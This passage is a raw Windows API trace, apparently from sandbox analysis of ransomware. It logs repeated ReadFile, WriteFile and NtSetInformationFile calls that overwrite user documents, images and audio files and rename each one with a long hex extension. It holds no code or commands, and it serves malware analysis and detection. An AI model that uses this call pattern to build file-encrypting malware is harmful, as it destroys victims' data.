CloseHandle (hObject=0x334) returned 1 [0119.150] GetProcessHeap () returned 0x600000 [0119.150] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.151] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0119.156] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x27fff70) returned 0x0 [0119.157] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt", lpString2=".C593E9CA1908B8B0627DF5E852A3FE4008CCA96D34B0CD8CEF10EEA9FB40234C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt.C593E9CA1908B8B0627DF5E852A3FE4008CCA96D34B0CD8CEF10EEA9FB40234C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt.C593E9CA1908B8B0627DF5E852A3FE4008CCA96D34B0CD8CEF10EEA9FB40234C" [0119.157] GetProcessHeap () returned 0x600000 [0119.157] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3185968 [0119.157] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x3185968, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.158] CloseHandle (hObject=0x308) returned 1 [0119.158] GetProcessHeap () returned 0x600000 [0119.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0119.159] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.005] ReadFile (in: hFile=0x320, lpBuffer=0x32c0180, nNumberOfBytesToRead=0x5400, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32a0048) returned 1 [0122.006] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.006] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x32a00f8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32a00f8, ReturnLength=0x27fff70) returned 0x0 [0122.007] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a", lpString2=".9A0A21C4212927ACB047E66C4A3C2C7923FA3959E95A82BE1034FDF11E19585C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a.9A0A21C4212927ACB047E66C4A3C2C7923FA3959E95A82BE1034FDF11E19585C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a.9A0A21C4212927ACB047E66C4A3C2C7923FA3959E95A82BE1034FDF11E19585C" [0122.007] GetProcessHeap () returned 0x600000 [0122.007] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13e) returned 0x3162fd8 [0122.007] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x27fff60, FileInformation=0x3162fd8, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0122.008] CloseHandle (hObject=0x320) returned 1 [0122.008] GetProcessHeap () returned 0x600000 [0122.008] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0048 | out: hHeap=0x600000) returned 1 [0122.009] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.010] WriteFile (in: hFile=0x324, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0122.011] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.018] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x27fff70) returned 0x0 [0122.018] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a", lpString2=".52382B838FA51CC9F8E137B0B34CCA373C9644424BB390CD8FA03AB9155E434B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a.52382B838FA51CC9F8E137B0B34CCA373C9644424BB390CD8FA03AB9155E434B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a.52382B838FA51CC9F8E137B0B34CCA373C9644424BB390CD8FA03AB9155E434B" [0122.018] GetProcessHeap () returned 0x600000 [0122.018] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x318d910 [0122.018] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x27fff60, FileInformation=0x318d910, Length=0x138, FileInformationClass=0xa) returned 0x0 [0122.019] CloseHandle (hObject=0x32c) returned 1 [0122.020] GetProcessHeap () returned 0x600000 [0122.020] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0122.022] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.023] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x3318500, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x3318500, ReturnLength=0x27fff70) returned 0x0 [0122.024] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc", lpString2=".87F74FB1A49371722AEAF0B142BEBEC36AB50380A9801EB70CAD769607F7D740" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc.87F74FB1A49371722AEAF0B142BEBEC36AB50380A9801EB70CAD769607F7D740") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc.87F74FB1A49371722AEAF0B142BEBEC36AB50380A9801EB70CAD769607F7D740" [0122.024] GetProcessHeap () returned 0x600000 [0122.024] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x318da58 [0122.024] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x27fff60, FileInformation=0x318da58, Length=0x138, FileInformationClass=0xa) returned 0x0 [0122.025] CloseHandle (hObject=0x318) returned 1 [0122.025] GetProcessHeap () returned 0x600000 [0122.025] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3318450 | out: hHeap=0x600000) returned 1 [0122.028] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.029] ReadFile (in: hFile=0x308, lpBuffer=0x33606e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x33405a8 | out: lpBuffer=0x33606e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x33405a8) returned 1 [0122.029] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.030] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x3340658, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x3340658, ReturnLength=0x27fff70) returned 0x0 [0122.030] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3", lpString2=".FEBD78BF0E017B7E106AE93DC040BDEEBDC6B065B2AD85EB002D729EAC1A3749" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3.FEBD78BF0E017B7E106AE93DC040BDEEBDC6B065B2AD85EB002D729EAC1A3749") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3.FEBD78BF0E017B7E106AE93DC040BDEEBDC6B065B2AD85EB002D729EAC1A3749" [0122.030] GetProcessHeap () returned 0x600000 [0122.030] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x318e0c0 [0122.030] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x318e0c0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0122.032] CloseHandle (hObject=0x308) returned 1 [0122.032] GetProcessHeap () returned 0x600000 [0122.032] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x33405a8 | out: hHeap=0x600000) returned 1 [0122.033] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.038] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.038] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.039] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.040] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav", lpString2=".B2D1B0DD137961B82CD2FA859B34126BBA5C3A683B43F69CDA58C0EA11882C4F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav.B2D1B0DD137961B82CD2FA859B34126BBA5C3A683B43F69CDA58C0EA11882C4F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav.B2D1B0DD137961B82CD2FA859B34126BBA5C3A683B43F69CDA58C0EA11882C4F" [0122.040] GetProcessHeap () returned 0x600000 [0122.040] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x6dc6f0 [0122.040] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x6dc6f0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0122.041] CloseHandle (hObject=0x308) returned 1 [0122.042] GetProcessHeap () returned 0x600000 [0122.042] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.042] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.046] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x6400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.046] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.047] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.047] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp", lpString2=".25DB12519B1D2F2251694BD274A938703F66BB8001345846CE2B9C0A1E72C422" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp.25DB12519B1D2F2251694BD274A938703F66BB8001345846CE2B9C0A1E72C422") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\DHT-H7PYbtrzMxg.bmp.25DB12519B1D2F2251694BD274A938703F66BB8001345846CE2B9C0A1E72C422" [0122.047] GetProcessHeap () returned 0x600000 [0122.047] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x318dba0 [0122.048] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x318dba0, Length=0x136, FileInformationClass=0xa) returned 0x0 [0122.049] CloseHandle (hObject=0x308) returned 1 [0122.049] GetProcessHeap () returned 0x600000 [0122.049] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.049] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.052] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.052] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.053] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.054] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a", lpString2=".EB5E098292980557AB01FC469CC64213C18D797ECB6CE05A80D0E69855095331" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a.EB5E098292980557AB01FC469CC64213C18D797ECB6CE05A80D0E69855095331") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\Diboyxb.m4a.EB5E098292980557AB01FC469CC64213C18D797ECB6CE05A80D0E69855095331" [0122.054] GetProcessHeap () returned 0x600000 [0122.054] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x62f3f8 [0122.054] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x62f3f8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0122.055] CloseHandle (hObject=0x308) returned 1 [0122.055] GetProcessHeap () returned 0x600000 [0122.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.056] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.062] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.062] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.063] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.064] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv", lpString2=".3FA18D469137AF74B67F4139BF60E046E504605A01A2940455043F6E57E9A025" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv.3FA18D469137AF74B67F4139BF60E046E504605A01A2940455043F6E57E9A025") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\EE87_ApRg.flv.3FA18D469137AF74B67F4139BF60E046E504605A01A2940455043F6E57E9A025" [0122.064] GetProcessHeap () returned 0x600000 [0122.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x62f528 [0122.064] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x62f528, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0122.065] CloseHandle (hObject=0x308) returned 1 [0122.065] GetProcessHeap () returned 0x600000 [0122.066] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.066] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.069] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.069] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.070] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.071] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg", lpString2=".52E4A66AF6832EC23FC0234F40CF738252A2BF9D138AA04B4282985578A7E65B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg.52E4A66AF6832EC23FC0234F40CF738252A2BF9D138AA04B4282985578A7E65B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\f4IlzxrUDx.jpg.52E4A66AF6832EC23FC0234F40CF738252A2BF9D138AA04B4282985578A7E65B" [0122.071] GetProcessHeap () returned 0x600000 [0122.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x62f660 [0122.071] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x62f660, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0122.072] CloseHandle (hObject=0x308) returned 1 [0122.072] GetProcessHeap () returned 0x600000 [0122.072] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.072] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.076] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.076] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.077] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.077] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3", lpString2=".053726DFECDF91045606C7BA0A2E6A16C9CBAD961A0C9EC46B7AC21C4417E024" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3.053726DFECDF91045606C7BA0A2E6A16C9CBAD961A0C9EC46B7AC21C4417E024") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\GcjMwU.mp3.053726DFECDF91045606C7BA0A2E6A16C9CBAD961A0C9EC46B7AC21C4417E024" [0122.077] GetProcessHeap () returned 0x600000 [0122.077] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x62f798 [0122.077] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x62f798, Length=0x124, FileInformationClass=0xa) returned 0x0 [0122.081] CloseHandle (hObject=0x308) returned 1 [0122.082] GetProcessHeap () returned 0x600000 [0122.082] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.083] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.088] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.088] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.089] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x27fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x27fff70) returned 0x0 [0122.089] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx", lpString2=".EDEFDD8F3FD3F3E303E6D169ED452291B0DB5BC6768AC2E3599E89A23C3F9D12" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx.EDEFDD8F3FD3F3E303E6D169ED452291B0DB5BC6768AC2E3599E89A23C3F9D12") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\H8r4Wp5m p94hX.pptx.EDEFDD8F3FD3F3E303E6D169ED452291B0DB5BC6768AC2E3599E89A23C3F9D12" [0122.089] GetProcessHeap () returned 0x600000 [0122.089] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x318dce8 [0122.090] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x27fff60, FileInformation=0x318dce8, Length=0x136, FileInformationClass=0xa) returned 0x0 [0122.091] CloseHandle (hObject=0x308) returned 1 [0122.091] GetProcessHeap () returned 0x600000 [0122.091] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.091] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.094] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.095] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x27fff7c, lpCompletionKey=0x27fff78, lpOverlapped=0x27fff74) returned 1 [0122.095] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, 